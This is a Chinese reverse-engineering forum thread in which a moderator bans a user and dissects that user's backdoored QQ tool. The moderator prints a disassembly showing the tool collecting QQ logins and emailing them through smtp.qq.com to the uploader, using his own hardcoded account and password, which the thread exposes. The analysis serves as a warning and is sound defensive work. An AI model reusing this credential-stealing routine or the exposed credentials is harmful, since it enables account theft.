吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 158375|回复: 677
收起左侧

BanID:1529937【发布软件添加盗QQ后门】

    [复制链接]
LCG 发表于 2015-11-30 18:11
BanID:1529937【发布软件添加盗QQ后门】

今天例行在原创区审核新帖子,发现一篇帖子http://www.52pojie.cn/thread-439861-1-1.html(可以百度快照看)

1.png
2.png

看到“怕有毒绕道 ”这种言辞立马关注到,放木马病毒的最会用这样言辞骗取他人信任,空口无凭还是要用技术来验证一下,下了文件调试一下,加了SE的壳直接跑起来看到如下代码:


0040B19E    55                 push ebp
0040B19F    8BEC               mov ebp,esp
0040B1A1    81EC 1C000000      sub esp,0x1C
0040B1A7    6A 00              push 0x0
0040B1A9    6A 00              push 0x0
0040B1AB    6A 00              push 0x0
0040B1AD    68 04000080        push 0x80000004
0040B1B2    6A 00              push 0x0
0040B1B4    68 F17D4C00        push 一键拉好.004C7DF1                      ; qwqwqw123
0040B1B9    68 04000080        push 0x80000004
0040B1BE    6A 00              push 0x0
0040B1C0    68 FB7D4C00        push 一键拉好.004C7DFB                      ; 1529937
0040B1C5    68 01030080        push 0x80000301
0040B1CA    6A 00              push 0x0
0040B1CC    68 19000000        push 0x19
0040B1D1    68 04000080        push 0x80000004
0040B1D6    6A 00              push 0x0
0040B1D8    68 037E4C00        push 一键拉好.004C7E03                      ; smtp.qq.com
0040B1DD    68 05000000        push 0x5
0040B1E2    B8 04000000        mov eax,0x4
0040B1E7    BB 40CA4700        mov ebx,一键拉好.0047CA40
0040B1EC    E8 3E830000        call 一键拉好.0041352F
0040B1F1    83C4 40            add esp,0x40
0040B1F4    6A FF              push -0x1
0040B1F6    6A 08              push 0x8
0040B1F8    68 CB810116        push 0x160181CB
0040B1FD    68 01000152        push 0x52010001
0040B202    E8 2E830000        call 一键拉好.00413535
0040B207    83C4 10            add esp,0x10
0040B20A    8945 FC            mov dword ptr ss:[ebp-0x4],eax
0040B20D    6A FF              push -0x1
0040B20F    6A 08              push 0x8
0040B211    68 CC810116        push 0x160181CC
0040B216    68 01000152        push 0x52010001
0040B21B    E8 15830000        call 一键拉好.00413535
0040B220    83C4 10            add esp,0x10
0040B223    8945 F8            mov dword ptr ss:[ebp-0x8],eax
0040B226    FF75 F8            push dword ptr ss:[ebp-0x8]
0040B229    68 0F7E4C00        push 一键拉好.004C7E0F                      ; \r\n密码:
0040B22E    FF75 FC            push dword ptr ss:[ebp-0x4]
0040B231    68 187E4C00        push 一键拉好.004C7E18                      ; 账号:
0040B236    B9 04000000        mov ecx,0x4
0040B23B    E8 2F5EFFFF        call 一键拉好.0040106F
0040B240    83C4 10            add esp,0x10
0040B243    8945 F4            mov dword ptr ss:[ebp-0xC],eax
0040B246    8B5D FC            mov ebx,dword ptr ss:[ebp-0x4]
0040B249    85DB               test ebx,ebx
0040B24B    74 09              je short 一键拉好.0040B256
0040B24D    53                 push ebx
0040B24E    E8 C4820000        call 一键拉好.00413517
0040B253    83C4 04            add esp,0x4
0040B256    8B5D F8            mov ebx,dword ptr ss:[ebp-0x8]
0040B259    85DB               test ebx,ebx
0040B25B    74 09              je short 一键拉好.0040B266
0040B25D    53                 push ebx
0040B25E    E8 B4820000        call 一键拉好.00413517
0040B263    83C4 04            add esp,0x4
0040B266    6A 00              push 0x0
0040B268    6A 00              push 0x0
0040B26A    6A 00              push 0x0
0040B26C    68 04000080        push 0x80000004
0040B271    6A 00              push 0x0
0040B273    68 1F7E4C00        push 一键拉好.004C7E1F                      ; 1529937@qq.com
0040B278    BB 06000000        mov ebx,0x6
0040B27D    E8 E165FFFF        call 一键拉好.00401863
0040B282    68 04000080        push 0x80000004
0040B287    6A 00              push 0x0
0040B289    68 1F7E4C00        push 一键拉好.004C7E1F                      ; 1529937@qq.com
0040B28E    68 04000080        push 0x80000004
0040B293    6A 00              push 0x0
0040B295    8B45 F4            mov eax,dword ptr ss:[ebp-0xC]
0040B298    85C0               test eax,eax
0040B29A    75 05              jnz short 一键拉好.0040B2A1
0040B29C    B8 356D4A00        mov eax,一键拉好.004A6D35
0040B2A1    50                 push eax
0040B2A2    68 04000080        push 0x80000004
0040B2A7    6A 00              push 0x0
0040B2A9    68 2E7E4C00        push 一键拉好.004C7E2E                      ; QQ群盗号
0040B2AE    68 07000000        push 0x7
0040B2B3    B8 04000000        mov eax,0x4
0040B2B8    BB B0CA4700        mov ebx,一键拉好.0047CAB0
0040B2BD    E8 6D820000        call 一键拉好.0041352F
0040B2C2    83C4 58            add esp,0x58
0040B2C5    8BD8               mov ebx,eax
0040B2C7    85DB               test ebx,ebx
0040B2C9    74 09              je short 一键拉好.0040B2D4
0040B2CB    53                 push ebx
0040B2CC    E8 46820000        call 一键拉好.00413517
0040B2D1    83C4 04            add esp,0x4
0040B2D4    8B5D F4            mov ebx,dword ptr ss:[ebp-0xC]
0040B2D7    85DB               test ebx,ebx
0040B2D9    74 09              je short 一键拉好.0040B2E4
0040B2DB    53                 push ebx
0040B2DC    E8 36820000        call 一键拉好.00413517
0040B2E1    83C4 04            add esp,0x4
0040B2E4    68 04000200        push 0x20004
0040B2E9    68 D0810116        push 0x160181D0
0040B2EE    68 01000152        push 0x52010001
0040B2F3    68 01000000        push 0x1
0040B2F8    B8 01000000        mov eax,0x1
0040B2FD    BB C07B4700        mov ebx,一键拉好.00477BC0
0040B302    E8 28820000        call 一键拉好.0041352F
0040B307    83C4 10            add esp,0x10
0040B30A    6A FF              push -0x1
0040B30C    6A 08              push 0x8
0040B30E    68 E2810116        push 0x160181E2
0040B313    68 01000152        push 0x52010001
0040B318    E8 18820000        call 一键拉好.00413535
0040B31D    83C4 10            add esp,0x10
0040B320    8945 FC            mov dword ptr ss:[ebp-0x4],eax
0040B323    68 356D4A00        push 一键拉好.004A6D35
0040B328    FF75 FC            push dword ptr ss:[ebp-0x4]
0040B32B    E8 8E61FFFF        call 一键拉好.004014BE
0040B330    83C4 08            add esp,0x8
0040B333    83F8 00            cmp eax,0x0
0040B336    B8 00000000        mov eax,0x0
0040B33B    0F95C0             setne al
0040B33E    8945 F8            mov dword ptr ss:[ebp-0x8],eax
0040B341    8B5D FC            mov ebx,dword ptr ss:[ebp-0x4]
0040B344    85DB               test ebx,ebx
0040B346    74 09              je short 一键拉好.0040B351
0040B348    53                 push ebx
0040B349    E8 C9810000        call 一键拉好.00413517
0040B34E    83C4 04            add esp,0x4
0040B351    837D F8 00         cmp dword ptr ss:[ebp-0x8],0x0
0040B355    0F84 A9000000      je 一键拉好.0040B404
0040B35B    6A FF              push -0x1
0040B35D    6A 08              push 0x8
0040B35F    68 E3810116        push 0x160181E3
0040B364    68 01000152        push 0x52010001
0040B369    E8 C7810000        call 一键拉好.00413535
0040B36E    83C4 10            add esp,0x10
0040B371    8945 F4            mov dword ptr ss:[ebp-0xC],eax
0040B374    68 356D4A00        push 一键拉好.004A6D35
0040B379    FF75 F4            push dword ptr ss:[ebp-0xC]
0040B37C    E8 3D61FFFF        call 一键拉好.004014BE
0040B381    83C4 08            add esp,0x8
0040B384    83F8 00            cmp eax,0x0
0040B387    B8 00000000        mov eax,0x0
0040B38C    0F95C0             setne al
0040B38F    8945 F0            mov dword ptr ss:[ebp-0x10],eax
0040B392    8B5D F4            mov ebx,dword ptr ss:[ebp-0xC]
0040B395    85DB               test ebx,ebx
0040B397    74 09              je short 一键拉好.0040B3A2
0040B399    53                 push ebx
0040B39A    E8 78810000        call 一键拉好.00413517
0040B39F    83C4 04            add esp,0x4
0040B3A2    837D F0 00         cmp dword ptr ss:[ebp-0x10],0x0
0040B3A6    0F84 58000000      je 一键拉好.0040B404
0040B3AC    6A FF              push -0x1
0040B3AE    6A 08              push 0x8
0040B3B0    68 E4810116        push 0x160181E4
0040B3B5    68 01000152        push 0x52010001
0040B3BA    E8 76810000        call 一键拉好.00413535
0040B3BF    83C4 10            add esp,0x10
0040B3C2    8945 EC            mov dword ptr ss:[ebp-0x14],eax
0040B3C5    68 356D4A00        push 一键拉好.004A6D35
0040B3CA    FF75 EC            push dword ptr ss:[ebp-0x14]
0040B3CD    E8 EC60FFFF        call 一键拉好.004014BE
0040B3D2    83C4 08            add esp,0x8
0040B3D5    83F8 00            cmp eax,0x0
0040B3D8    B8 00000000        mov eax,0x0
0040B3DD    0F95C0             setne al
0040B3E0    8945 E8            mov dword ptr ss:[ebp-0x18],eax
0040B3E3    8B5D EC            mov ebx,dword ptr ss:[ebp-0x14]
0040B3E6    85DB               test ebx,ebx
0040B3E8    74 09              je short 一键拉好.0040B3F3
0040B3EA    53                 push ebx
0040B3EB    E8 27810000        call 一键拉好.00413517
0040B3F0    83C4 04            add esp,0x4
0040B3F3    837D E8 00         cmp dword ptr ss:[ebp-0x18],0x0
0040B3F7    0F84 07000000      je 一键拉好.0040B404
0040B3FD    B8 01000000        mov eax,0x1
0040B402    EB 05              jmp short 一键拉好.0040B409
0040B404    B8 00000000        mov eax,0x0
0040B409    85C0               test eax,eax
0040B40B    0F84 32000000      je 一键拉好.0040B443
0040B411    BB 06000000        mov ebx,0x6
0040B416    E8 4864FFFF        call 一键拉好.00401863
0040B41B    68 06000080        push 0x80000006
0040B420    6A 00              push 0x0
0040B422    68 6BA44000        push 一键拉好.0040A46B
0040B427    68 03000000        push 0x3
0040B42C    B8 03000000        mov eax,0x3
0040B431    BB 30C94700        mov ebx,一键拉好.0047C930
0040B436    E8 F4800000        call 一键拉好.0041352F
0040B43B    83C4 28            add esp,0x28
0040B43E    E9 34000000        jmp 一键拉好.0040B477
0040B443    BB 06000000        mov ebx,0x6
0040B448    E8 1664FFFF        call 一键拉好.00401863
0040B44D    68 01030080        push 0x80000301
0040B452    6A 00              push 0x0
0040B454    68 10000000        push 0x10
0040B459    68 04000080        push 0x80000004
0040B45E    6A 00              push 0x0
0040B460    68 377E4C00        push 一键拉好.004C7E37                      ; 请重新登录QQ!
0040B465    68 04000000        push 0x4
0040B46A    BB 604B4100        mov ebx,一键拉好.00414B60
0040B46F    E8 B5800000        call 一键拉好.00413529
0040B474    83C4 34            add esp,0x34
0040B477    8BE5               mov esp,ebp
0040B479    5D                 pop ebp
0040B47A    C3                 retn



4.png

代码什么意思了?简单的说就是把登陆软件获取到的QQ账号和密码,通过QQ:1529937和密码:qwqwqw123登陆邮箱,然后发送到1529937@qq.com他自己的邮箱里,描述是“QQ群盗号”,还挺直白,可以通过QQ和就看到和这作者名字相同,应该就是他没错了,这小黑智商很堪忧,居然把自己QQ密码写到程序里,别人QQ盗了没有不知道,反正你QQ估计已经被盗了。

3.png

注意:
使用过此软件的同学请尽快修改QQ密码。


想对那些涂怀不轨的人说,你在吾爱破解这样的技术论坛玩这种小伎俩,分分钟就给你剥皮把肉看得清清楚楚了,这里都是活跃在互联网安全界的精英,任何小动作就是自讨苦吃,奉劝那些蠢蠢欲动的人,尽快走入正途,不要误入歧途!

最后感谢大家一直以来对吾爱破解论坛的支持和维护,论坛安全离不开大家监督,任何违法违规的行为都逃不过大家的眼睛和管理的审查,对待此类*渣论坛绝不手软,坚决处罚到底!

免费评分

参与人数 385吾爱币 +12 热心值 +384 收起 理由
凡尘不动我心 + 1 + 1 大佬厉害
Tim-52Pojie + 1 + 1 2017-11-2亲测已经登不上去了#滑稽
fhvk1993 + 1 我很赞同!
wto007 + 1 + 1 谢谢@Thanks!
午时怎么还没到 + 1 + 1 热心回复!
xineohp + 1 + 1 希望52pojie弘扬正气,越来越好!
静叶流云 + 1 谢谢@Thanks!
novel奶优 + 1 谢谢@Thanks!
xinyang635 + 1 + 1 谢谢@Thanks!
z1871691387 + 1 + 1 热心回复!
18716570343 + 1 + 1 谢谢@Thanks!
zaqw0001 + 2 + 1 热心回复!
好啊好啊 + 1 + 1 用心讨论,共获提升!
qaue945 + 1 默默的围观0.0
23333Abc + 1 热心回复!
Himily + 1 我很赞同!
_左撇子 + 1 我很赞同!
小枫丶 + 1 谢谢提醒谢谢提醒
chyq20 + 1 用心讨论,共获提升!
zwc123xyz + 1 老大慧眼,小丑跳梁的把戏!老大一眼识破!
liuruiran + 1 我很赞同!
aaabbbccc + 1 我很赞同!
fhangong + 1 我很赞同!
samjun + 1 我很赞同!
倚楼听风雨 + 1 小白不懂,看起很高大上,感谢提醒!!
双喜中国 + 1 用心讨论,共获提升!
小树丶 + 1 我很赞同!
天蝎梦 + 1 我很赞同!
胖胖的施一诺 + 1 我很赞同!
命运的追逐 + 1 热心回复!
吾爱老司机 + 1 谢谢@Thanks!
weiweiLUCKY + 1 热心回复!
Swine + 1 必须给赞
911061873 + 1 热心回复!
cl_tyrande + 1 热心回复!
prudential + 1 谢谢@Thanks!
木易Oppa + 1 已答复!
412 + 1 我很赞同!
LittleK + 1 用心讨论,共获提升!
逝水流年轻染尘 + 1 用心讨论,共获提升!
wenri + 1 我很赞同!
月儿 + 1 我很赞同!
奉西 + 1 我很赞同!
yeric1993 + 1 谢谢@Thanks!
依恋天空shine + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩.
hlf045 + 1 我很赞同!
饺子不过好吃 + 1 感谢您的宝贵建议,我们会努力争取做得更好.
颜兮茶兔 + 1 我很赞同!
bie.ren + 1 我很赞同!
jaril + 1 我很赞同!
中国法制史 + 1 谢谢@Thanks!
陈清池 + 1 我很赞同!
忘记了1 + 1 我很赞同!
573220466 + 1 热心回复!
hangchao1990 + 1 想对那些涂怀不轨的人说,你在吾爱破解这样.
lg8593298 + 1 谢谢@Thanks!
祖国的杂草 + 1 我很赞同!
zhz179179 + 1 我很赞同!
苍穹的黎明 + 1 6666666
洹水清风 + 1 我很赞同!
Crigin + 1 热心回复!
GsWater + 1 我很赞同!
msnan + 1 我很赞同!
wu123 + 1 我很赞同!
sisco + 1 我很赞同!
看透世间百态 + 1 谢谢@Thanks!
yelpdudu + 1 感谢发布原创作品,吾爱破解论坛因你更精彩.
a767421378 + 1 我很赞同!
希伯来 + 1 我很赞同!
launever + 1 我很赞同!
Wildest + 1 我很赞同!
784337045 + 1 谢谢@Thanks!
superu + 1 我很赞同!
v888 + 1 我很赞同!
wuxiankun + 1 66666666666666
hqz9494 + 1 谢谢@Thanks!
nblbf` + 1 我很赞同!
namecxz + 1 我很赞同!
小肚军 + 1 我很赞同!
tandesheng418 + 1 我很赞同!
haisenshi + 1 热心回复!
Lucifer2 + 1 谢谢@Thanks!
orgasmor + 1 谢谢@Thanks! 有你们这种精英的存在,是吾.
kingsaytay + 1 版主好可爱。。。。。
eio7 + 1 我很赞同!
苏不会念 + 1 我很赞同!
qiuhun1991 + 1 我很赞同!
辰世浪子 + 1 奉劝那些蠢蠢欲动的人,尽快走入正途,不要.
qiaomang + 1 傻逼一个,应该弄个垃圾号 可惜了7位qq
canhen + 1 我很赞同!
一方人士 + 1 谢谢@Thanks!
canchen001 + 1 我很赞同!
xuexi= + 1 我很赞同!
jian1314 + 1 我很赞同!
harry586 + 1 我很赞同!
逍遥一仙 + 1 谢谢@Thanks!
wait5203344 + 1 这简直是自寻死路....
zhiwei54345 + 1 我很赞同!
请输入用户名 + 1 我很赞同!
raysun + 1 我很赞同!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Thirteen 发表于 2015-11-30 18:26
用7位QQ的人还能犯这种错误,真是没想到

免费评分

参与人数 1热心值 +1 收起 理由
1715173329 + 1 +1

查看全部评分

头像被屏蔽
呆鹏网络 发表于 2015-11-30 18:23
bigharvest 发表于 2015-11-30 19:06
每次看到大P的头像都感觉那个小女孩还可爱  哈哈
Sound 发表于 2015-11-30 18:15
奉劝那些蠢蠢欲动的人,尽快走入正途,不要误入歧途!

免费评分

参与人数 2热心值 +2 收起 理由
Dicker + 1 盯紧点,6位的QQ说不定都到手了!哈哈。
三生三世的爱 + 1 谢谢@Thanks!

查看全部评分

刺蝴蝶De箫启灵 发表于 2015-11-30 18:18
厉害,前排出售瓜子,西瓜,拉条。有意者请评分付款CB
紅竹 发表于 2015-11-30 18:17
啊啊啊啊啊啊啊啊啊啊啊啊啊,还好我没用
snwfnh 发表于 2015-11-30 18:17
膜拜大神 幸好没用这个软件  放毒可恶,
蓝、先生 发表于 2015-11-30 18:20
感谢大神提醒。
a769872964 发表于 2015-11-30 18:21
奉劝那些蠢蠢欲动的人,尽快走入正途,不要误入歧途!
浮生若梦丶 发表于 2015-11-30 18:24
试试申诉他的QQ号
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 提醒:禁止复制他人回复等『恶意灌水』行为,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-19 14:54

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表